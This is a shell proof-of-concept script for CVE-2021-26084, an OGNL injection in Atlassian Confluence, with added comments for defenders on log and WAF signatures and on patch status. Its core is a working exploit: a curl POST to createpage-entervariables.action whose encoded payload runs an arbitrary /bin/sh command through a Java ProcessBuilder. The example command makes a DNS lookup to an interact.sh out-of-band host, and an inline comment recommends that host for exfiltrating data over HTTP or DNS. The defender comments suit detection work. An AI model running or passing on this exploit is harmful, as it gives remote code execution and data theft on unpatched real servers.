# PoC script for CVE-2021-26084 (Confluence OGNL injection); the commands are kept exactly as the
# author wrote them, only comments are added.
# Defender notes: the single POST below is the observable artefact. Access-log or WAF review for
# /pages/createpage-entervariables.action requests whose body carries OGNL escape sequences
# (\u0027, \u0022, class.forName, ScriptEngineManager) - and, for this PoC specifically, the
# User-Agent "cve-2021-26084-confluence poc" - surfaces it. Mitigation is the vendor fix; on a
# patched server the payload is returned unevaluated (see the final echo for what to look for).
# No shebang is present, so which shell interprets this is unknown; see the echo notes below.
host='your.server.here.com' # target Confluence host; reused for the Host: header and the URL
spacekey=$'ST' # This can be any valid SpaceKey on your server.
sessionid='C88CREDCATEDREDACTEDREDACTEDF81C4' # The is held in the JSESSIONID cookie of any valid confluence session
# Epoch seconds as a per-run unique DNS label, so an out-of-band lookup can be attributed to this run.
uid=`date +%s`
cmd="nslookup $uid.c4qstll9481fv55eb7pgcr4h7iayyyyyn.interact.sh" # Command to run. Note execution is blind, the output will not be shown. Obviously interact.sh is great for exfilling over http/dns
# $"..." is bash locale-translation quoting; with no message catalog it behaves like an ordinary
# double-quoted string, so the \u00xx sequences stay literal and are decoded server-side
# (under $'...' bash itself would decode them, which is why that form is not used here).
payload=$"queryString=gdp\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/sh\u0027,\u0027-c\u0027,\u0027"$cmd"\u0027]);x.start();\u0022)}%2b\u0027"
len=${#payload} # character count for Content-Length; the payload is ASCII, so this equals the byte length
# NOTE(review): the \n escapes print as newlines only if the shell's echo expands them (dash's does;
# bash's does not without -e).
echo "\n\nCurl output is\n"
# -s hides progress output and -k disables TLS certificate verification; the response is filtered
# for the "gdp" marker that brackets the injected expression in the payload above.
curl -s -k -X $'POST' -H "Host: $host" -H $'User-Agent: cve-2021-26084-confluence poc' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H "Content-Length: $len" -b "JSESSIONID=$sessionid" --data-binary "$payload" "https://$host/confluence/pages/createpage-entervariables.action?spaceKey=$spacekey" | grep -i gdp
# Same echo caveat as above for the leading \n.
echo "\nOn an unpatched system, look for something like value=\"gdp{java.lang.UNIXProcess@2dbfa3f7=null}\" on a patched system you will see the encoded payload"
echo "cmd run was $cmd"